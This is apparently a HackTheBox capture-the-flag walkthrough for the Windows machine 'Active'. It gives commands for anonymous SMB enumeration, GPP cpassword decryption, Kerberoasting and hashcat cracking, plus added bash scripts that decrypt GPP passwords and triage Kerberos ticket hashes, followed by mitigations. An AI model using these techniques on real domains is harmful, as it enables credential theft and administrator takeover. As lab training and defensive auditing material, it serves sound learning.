Active

Overview

Machine: Active
Platform: HackTheBox
Difficulty: Easy
OS: Windows

This machine focuses on SMB enumeration, Group Policy Preferences (GPP) credential extraction, and Kerberoasting.

Kill Chain

  1. Anonymous SMB access
  2. Retrieve Groups.xml from SYSVOL
  3. Decrypt GPP password
  4. Kerberoast Administrator account
  5. Crack hash -> Administrator access

Needed Tools

  • nmap
  • NetExec (nxc)
  • smbclient and smbmap
  • gpp-decrypt
  • targetedKerberoast
  • hashcat

Recon

  • Add the target IP address to the local /etc/hosts file.
echo "$IP active.htb" | sudo tee -a /etc/hosts
  • Perform an Nmap scan to identify open ports and running services.
nmap -Pn active.htb

[screenshot: nmap]

nmap -sCV active.htb

[screenshot: nmap -sCV]

  • Verify whether anonymous (guest) access is enabled on SMB.
nxc smb active.htb -u guest -p ''
  • List the shares over a null session (no credentials) with smbclient; -N sends an empty password rather than the guest account.
smbclient -N -L active.htb

[screenshot: smbclient]

Enumeration

  • List the contents of the accessible SMB shares.
smbclient //active.htb/Replication -N

[screenshot: smbclient]

  • Perform a recursive enumeration of all files within the shares.
recurse ON
ls

[screenshot: smbclient]

  • Locate Groups.xml under the Default Domain Policy GUID and view it (use get to download a copy for decryption).
more \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml

Initial Access

[screenshot: smbmap]

  • Extract embedded credentials from the groups.xml file.
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\*******" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="******" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\*******"/></User>
</Groups>

Group Policy Preferences (GPP) can store account credentials in policy XML files inside SYSVOL: Groups.xml here, but also ScheduledTasks.xml, Services.xml, DataSources.xml, Drives.xml and Printers.xml. The cpassword value is AES-256-CBC encrypted with a fixed key that Microsoft itself published in the MS-GPPREF specification, so anyone who can read SYSVOL (every domain user, and on this box an anonymous user via the Replication share) can decrypt it. MS14-025 stopped the Group Policy Management Console from writing new cpassword entries, but it does not remove entries that already exist.

  • Decrypt the retrieved password from the groups.xml file.
gpp-decrypt *******
  • Validate the credentials with smbmap and list which shares they can reach.
smbmap -u ******* -p "*******" -H active.htb

[screenshot: smbmap]
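The decryption step does not need gpp-decrypt at all. The script below is an added example, not part of the original write-up or of any tool it uses; it assumes a Linux host with bash, GNU coreutils, openssl and iconv. gpp_decrypt reverses the cpassword encoding with the published key, and gpp_scan goes beyond the write-up by auditing a whole SYSVOL tree for every preference file type that can carry a cpassword, which is also the check a defender runs for the "remove GPP credentials" mitigation below. The sample SYSVOL tree, the svc_demo and svc_backup accounts and the Winter2018! password are constructed for the demo; the second cpassword is the widely circulated GPP test vector that decrypts to Local*P4ssword!.

```shell
#!/usr/bin/env bash
# gpp_audit.sh - added example: decrypt GPP cpassword values and audit SYSVOL for them.
# Assumes bash, GNU coreutils, openssl and iconv (glibc) are available.
set -u

# AES-256 key published by Microsoft in [MS-GPPREF] 2.2.1.1.4 "Password Encryption".
GPP_AES_KEY="4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b"
ZERO_IV="00000000000000000000000000000000"

# gpp_decrypt CPASSWORD -> plaintext
# cpassword = base64(AES-256-CBC(key, iv=0, PKCS#7(UTF-16LE(password)))) with '=' stripped.
gpp_decrypt() {
  local cpass="$1" pad
  pad=$(( (4 - ${#cpass} % 4) % 4 ))          # restore the base64 padding GPP drops
  { printf '%s' "$cpass"; printf '%*s' "$pad" '' | tr ' ' '='; } \
    | base64 -d \
    | openssl enc -d -aes-256-cbc -K "$GPP_AES_KEY" -iv "$ZERO_IV" \
    | iconv -f UTF-16LE -t UTF-8
}

# gpp_encrypt PASSWORD -> cpassword. Only used here to build sample data: since MS14-025 the
# GPMC refuses to write new cpassword values, but old ones stay in SYSVOL until deleted.
gpp_encrypt() {
  printf '%s' "$1" \
    | iconv -f UTF-8 -t UTF-16LE \
    | openssl enc -aes-256-cbc -K "$GPP_AES_KEY" -iv "$ZERO_IV" \
    | base64 -w0 | tr -d '='
}

# gpp_scan SYSVOL_DIR -> one line per stored credential: "<file> <account> <plaintext>"
# Checks every preference file type that can carry cpassword, not only Groups.xml.
gpp_scan() {
  local f attr cpass user
  find "$1" -type f \( -iname Groups.xml -o -iname Services.xml -o -iname ScheduledTasks.xml \
       -o -iname DataSources.xml -o -iname Printers.xml -o -iname Drives.xml \) -print0 \
  | while IFS= read -r -d '' f; do
      # the account attribute differs per file type (userName, runAs, accountName); the
      # first one in the file is enough for single-entry files like the samples below
      user=$(grep -o -E '(userName|runAs|accountName)="[^"]*"' "$f" | head -n 1 | cut -d'"' -f2)
      grep -o 'cpassword="[^"]*"' "$f" | while IFS= read -r attr; do
        cpass=${attr#cpassword=\"}; cpass=${cpass%\"}
        [ -n "$cpass" ] || continue          # empty cpassword means no password was set
        printf '%s %s %s\n' "$f" "${user:-?}" "$(gpp_decrypt "$cpass")"
      done
    done
}

# make_sample_sysvol -> path of a constructed SYSVOL-like tree (demo data, not real policy)
make_sample_sysvol() {
  local root pol
  root=$(mktemp -d)
  pol="$root/active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences"
  mkdir -p "$pol/Groups" "$pol/ScheduledTasks"
  cat > "$pol/Groups/Groups.xml" <<EOF
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\svc_demo" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="$(gpp_encrypt 'Winter2018!')" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\svc_demo"/></User>
</Groups>
EOF
  # the cpassword below is the widely published GPP test vector (decrypts to Local*P4ssword!)
  cat > "$pol/ScheduledTasks/ScheduledTasks.xml" <<'EOF'
<?xml version="1.0" encoding="utf-8"?>
<ScheduledTasks clsid="{CC63F200-7309-4ba0-B154-A71CD118DBCC}"><Task clsid="{2DEECB1C-261F-4e13-9B21-16FB83BC03BD}" name="Backup"><Properties action="C" name="Backup" runAs="active.htb\svc_backup" cpassword="j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw" appName="C:\backup.exe"/></Task></ScheduledTasks>
EOF
  printf '%s\n' "$root"
}

# Usage: gpp_audit.sh /path/to/sysvol   (or a local copy of the Replication share)
[ $# -eq 0 ] || gpp_scan "$1"
```

Point gpp_scan at a copy of the Replication share pulled with smbclient's recurse/mget, or at the SYSVOL directory on a domain controller; any line it prints is a credential that has to be deleted from the policy and rotated, because the key that protects it is public.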

  • Establish an SMB session using smbclient.
smbclient //active.htb/Users -U ******* *******
  • Locate and retrieve the user flag.
more *******\Desktop\user.txt

Privilege escalation

  • Identify accounts vulnerable to Kerberoasting.

Kerberoasting targets accounts that have a Service Principal Name (SPN) registered. Any authenticated domain user can ask the KDC for a service ticket for any SPN; the service part of that ticket is encrypted with a key derived from the service account's password (RC4-HMAC, etype 23, unless the account is restricted to AES), so the ticket can be taken offline and brute-forced without touching the account or triggering lockouts. On this box the Administrator account itself carries an SPN, which is why the privileged account can be targeted directly.

  • Request service tickets for every account that has an SPN; targetedKerberoast also temporarily sets an SPN on accounts the current user can write to, requests a ticket, and removes it again. Keep the $krb5tgs$ line for the privileged account (here Administrator) and save it to hash.txt.
python targetedKerberoast.py -d active.htb -u ******* -p *******

[screenshot: smbclient]

  • Crack the obtained Kerberos hash to recover plaintext credentials.
hashcat -m 13100 hash.txt /usr/share/wordlists/rockyou.txt

[screenshot: hashcat]
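Before handing a file to hashcat it is worth checking which encryption type the KDC used, because the mode number depends on it (13100 for RC4, 19600 for AES128, 19700 for AES256) and an AES ticket is orders of magnitude slower to crack than the RC4 one obtained here. The script below is an added example, not part of the original write-up or of targetedKerberoast/hashcat; it assumes the $krb5tgs$<etype>$... format that impacket, targetedKerberoast and Rubeus emit, and only relies on the user/realm/SPN layout for etype 23. The two sample hashes are constructed: the SPNs are made up and the hex blobs are dummy values, not real ticket material.

```shell
#!/usr/bin/env bash
# krb5tgs_triage.sh - added example: sort Kerberoast hashes by etype before cracking.
set -u

# Constructed sample hashes. SPNs are invented and the hex blobs are dummy values.
SAMPLE_H23='$krb5tgs$23$*Administrator$ACTIVE.HTB$HTTP/web.active.htb*$0123456789abcdef0123456789abcdef$00112233445566778899aabbccddeeff'
SAMPLE_H18='$krb5tgs$18$svc_sql$ACTIVE.HTB$*MSSQLSvc/db.active.htb:1433*$0123456789abcdef01234567$00112233445566778899aabbccddeeff'

# krb5tgs_mode HASH -> hashcat mode for the etype carried in field 3 of the hash
krb5tgs_mode() {
  local etype
  etype=$(printf '%s' "$1" | cut -d'$' -f3)
  case "$etype" in
    23) printf '13100\n' ;;  # RC4-HMAC, keyed with the NT hash: fast to crack
    17) printf '19600\n' ;;  # AES128-CTS-HMAC-SHA1-96
    18) printf '19700\n' ;;  # AES256-CTS-HMAC-SHA1-96: PBKDF2-derived key, far slower
    *)  printf 'unsupported etype: %s\n' "$etype" >&2; return 1 ;;
  esac
}

# krb5tgs_target HASH -> "user realm spn", read from the etype-23 layout
#   $krb5tgs$23$*user$realm$spn*$checksum$edata
krb5tgs_target() {
  local rest
  rest=${1#\$krb5tgs\$23\$\*}          # drop the "$krb5tgs$23$*" prefix
  if [ "$rest" = "$1" ]; then
    printf 'not an etype-23 hash\n' >&2
    return 1
  fi
  rest=${rest%%\*\$*}                  # cut at the closing "*$", keeping user$realm$spn
  printf '%s\n' "$rest" | tr '$' ' '
}

# krb5tgs_split FILE OUTDIR -> writes OUTDIR/<mode>.txt, one file per hashcat mode,
# since hashcat runs a single -m per invocation. Prints the modes found.
krb5tgs_split() {
  local file="$1" outdir="$2" h m
  mkdir -p "$outdir"
  while IFS= read -r h; do
    [ -n "$h" ] || continue
    m=$(krb5tgs_mode "$h") || continue   # skip lines with an etype we cannot crack
    printf '%s\n' "$h" >> "$outdir/$m.txt"
  done < "$file"
  ls "$outdir" | sed 's/\.txt$//' | sort -u | paste -sd ' '
}

# Usage: krb5tgs_triage.sh hashes.txt outdir
if [ $# -eq 2 ]; then
  while IFS= read -r h; do
    [ -n "$h" ] || continue
    printf 'mode %s  %s\n' "$(krb5tgs_mode "$h")" \
      "$(krb5tgs_target "$h" 2>/dev/null || printf 'AES ticket')"
  done < "$1"
  printf 'modes written to %s: %s\n' "$2" "$(krb5tgs_split "$1" "$2")"
fi
```

Run it once over the targetedKerberoast output, then crack each OUTDIR/<mode>.txt with the matching -m; an AES-only result for a privileged account is a sign that the defender has already enforced AES on that account and that the password, not the etype, is the remaining weakness.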

  • Authenticate to SMB as the Administrator using smbclient.
smbclient //active.htb/Users -U Administrator *******

[screenshot: smbclient]

  • Locate and retrieve the root (Administrator) flag.
more Administrator\Desktop\root.txt

Possible Mitigation

  • Disable anonymous (null session) SMB access; the Replication share should not be readable without authentication.
  • Apply MS14-025, delete every existing cpassword entry from SYSVOL and rotate the accounts that were stored there; the patch stops new entries from being written but does not remove old ones.
  • Use long, random passwords (or group Managed Service Accounts) for accounts with SPNs, grant them the least privilege they need, and never register an SPN on Administrator or another privileged account.
  • Monitor SMB access patterns and Kerberos service ticket requests (event ID 4769 with RC4 encryption, etype 0x17, especially one source requesting tickets for many SPNs).